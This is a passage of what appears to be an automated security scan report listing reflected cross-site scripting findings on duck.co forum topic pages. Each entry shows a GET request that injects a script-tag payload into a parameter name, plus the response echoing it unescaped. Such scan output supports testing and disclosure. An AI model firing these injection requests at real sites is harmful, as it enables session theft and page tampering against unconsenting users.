<a href="/portalLogin.do?serviceurl=/topic/boolean-operators-and-parentheses-for-search-query?5356a"><script>alert(1)</script>3a5218a9e5f=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.56. http://duck.co/topic/cached-archived-links [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/cached-archived-links

Request

GET /topic/cached-archived-links?7d974"><script>alert(1)</script>095f9753999=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D2E90E509CCB6F18DAD71614C65EB2A8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/cached-archived-links?7d974"><script>alert(1)</script>095f9753999=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.57. http://duck.co/topic/changing-font-text-and-links [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/changing-font-text-and-links

Request

GET /topic/changing-font-text-and-links?90178"><script>alert(1)</script>8ecdba66b1c=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=1897635EDAA2F0CAADEC92E6DBDECDD1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:31 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/changing-font-text-and-links?90178"><script>alert(1)</script>8ecdba66b1c=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.58. http://duck.co/topic/ddg-gg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-gg

Request

GET /topic/ddg-gg?1f87d"><script>alert(1)</script>dfefae63fd=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=190EE55D6D5AFC25BB18BC1A5E8A2160; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:34 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-gg?1f87d"><script>alert(1)</script>dfefae63fd=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.59. http://duck.co/topic/ddg-in-alternative-web-browsers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-in-alternative-web-browsers

Request

GET /topic/ddg-in-alternative-web-browsers?99aef"><script>alert(1)</script>8dc5c01d57f=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8643BD559689B8B1B2A35FEE73948DD8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:50:22 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-in-alternative-web-browsers?99aef"><script>alert(1)</script>8dc5c01d57f=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.60. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-is-one-of-zoho-s-esteemed-customers

Request

GET /topic/ddg-is-one-of-zoho-s-esteemed-customers?ef673"><script>alert(1)</script>97c322092c0=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5BAAC7BC059097EB4C4595EF7F47428C; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:22 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-is-one-of-zoho-s-esteemed-customers?ef673"><script>alert(1)</script>97c322092c0=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.61. http://duck.co/topic/ddg-own-search-engine [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-own-search-engine

Request

GET /topic/ddg-own-search-engine?2b1fc"><script>alert(1)</script>6079817d7c6=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=48EF8EDDFB08BB8180EBFA8EE1ED6E7F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-own-search-engine?2b1fc"><script>alert(1)</script>6079817d7c6=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.62. http://duck.co/topic/ddg-userbar-to-spread-the-word [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-userbar-to-spread-the-word

Request

GET /topic/ddg-userbar-to-spread-the-word?6e0d2"><script>alert(1)</script>c711ea2f578=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7357B4605B817B31999CF53F381FC93A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:07 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-userbar-to-spread-the-word?6e0d2"><script>alert(1)</script>c711ea2f578=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.63. http://duck.co/topic/default-header-color [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/default-header-color

Request

GET /topic/default-header-color?ed6ea"><script>alert(1)</script>f49f4ebc8e8=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=69C479D219FF1E34996598716D010C9E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:57 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/default-header-color?ed6ea"><script>alert(1)</script>f49f4ebc8e8=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.64. http://duck.co/topic/differentiate-duckduckgo-with-other [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/differentiate-duckduckgo-with-other

Request

GET /topic/differentiate-duckduckgo-with-other?33e40"><script>alert(1)</script>80d2d67077=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C53C477ECA45E47A741E4783F2D88932; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:23 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/differentiate-duckduckgo-with-other?33e40"><script>alert(1)</script>80d2d67077=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.65. http://duck.co/topic/duckduckgo-webs-com-custom-logos [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/duckduckgo-webs-com-custom-logos

Request

GET /topic/duckduckgo-webs-com-custom-logos?71b97"><script>alert(1)</script>24f670c87a4=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7FEC343447A3EDBEBCF2C15BBFBBF6E6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:50:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/duckduckgo-webs-com-custom-logos?71b97"><script>alert(1)</script>24f670c87a4=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.66. http://duck.co/topic/foss-donation-nominations [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/foss-donation-nominations

Request

GET /topic/foss-donation-nominations?e6560"><script>alert(1)</script>8893641cad6=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=1BF8E9D44C39D4308649726146BA9967; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:49:50 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/foss-donation-nominations?e6560"><script>alert(1)</script>8893641cad6=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.67. http://duck.co/topic/freenet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/freenet

Request

GET /topic/freenet?feb85"><script>alert(1)</script>5394df960c0=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BBAD1E4A8BD73492FFDDB2EFEA473824; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:34 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/freenet?feb85"><script>alert(1)</script>5394df960c0=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.68. http://duck.co/topic/historical-traffic-stats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/historical-traffic-stats

Request

GET /topic/historical-traffic-stats?287ce"><script>alert(1)</script>9e498056177=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=527C52B094A985807596981DE2EFB7AE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:07 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/historical-traffic-stats?287ce"><script>alert(1)</script>9e498056177=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.69. http://duck.co/topic/how-to-get-similar-growth-for-2011 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/how-to-get-similar-growth-for-2011

Request

GET /topic/how-to-get-similar-growth-for-2011?cb1a9"><script>alert(1)</script>bdbfe7579a3=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B4E92709C63CE04D8FC50F8011402578; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:56 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/how-to-get-similar-growth-for-2011?cb1a9"><script>alert(1)</script>bdbfe7579a3=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.70. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/i-did-my-own-way-to-promote-ddg

Request

GET /topic/i-did-my-own-way-to-promote-ddg?6a9a1"><script>alert(1)</script>70bd9959dc1=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5E2E9786BF0F37BF051F6B02225AD55F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/i-did-my-own-way-to-promote-ddg?6a9a1"><script>alert(1)</script>70bd9959dc1=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.71. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/i-would-love-it-iff-i-need-ideas-fast-please-click

Request

GET /topic/i-would-love-it-iff-i-need-ideas-fast-please-click?b3e68"><script>alert(1)</script>87b04d6b67=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B8B1D27FE50247008C1F78BE09F3C85D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:53 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/i-would-love-it-iff-i-need-ideas-fast-please-click?b3e68"><script>alert(1)</script>87b04d6b67=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.72. http://duck.co/topic/logging-in-message-email-not-confirmed [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/logging-in-message-email-not-confirmed

Request

GET /topic/logging-in-message-email-not-confirmed?a0e4f"><script>alert(1)</script>83801aafa08=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=62DC997A865BBF66ADEAFC12A811D6E0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:49 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/logging-in-message-email-not-confirmed?a0e4f"><script>alert(1)</script>83801aafa08=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.73. http://duck.co/topic/maps [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/maps

Request

GET /topic/maps?5c925"><script>alert(1)</script>ec7c925f095=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=52D63293940E20BB0AE844B0B8A0BABB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:36 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/maps?5c925"><script>alert(1)</script>ec7c925f095=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.74. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/opera-thread-include-duckduckgo-in-default-search-engines

Request

GET /topic/opera-thread-include-duckduckgo-in-default-search-engines?19ff2"><script>alert(1)</script>ec978105e19=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9B089F9DC83D91BE5EF48E27F78CA0FF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:33 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/opera-thread-include-duckduckgo-in-default-search-engines?19ff2"><script>alert(1)</script>ec978105e19=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.75. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/pages-without-favicon-uses-ddg-favicon

Request

GET /topic/pages-without-favicon-uses-ddg-favicon?b78dc"><script>alert(1)</script>19944b86e4b=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=65C7D78F2AC808D79058929856CEAF1A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:31 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/pages-without-favicon-uses-ddg-favicon?b78dc"><script>alert(1)</script>19944b86e4b=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.76. http://duck.co/topic/post-your-ddg-sticker-photos [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/post-your-ddg-sticker-photos

Request

GET /topic/post-your-ddg-sticker-photos?c1bbe"><script>alert(1)</script>1efb70b60cd=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=327ADC48E6A2831C337F1D4796FA2D88; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:50:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/post-your-ddg-sticker-photos?c1bbe"><script>alert(1)</script>1efb70b60cd=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.77. http://duck.co/topic/q-html-entities [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/q-html-entities

Request

GET /topic/q-html-entities?4fa68"><script>alert(1)</script>073136e6f64=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
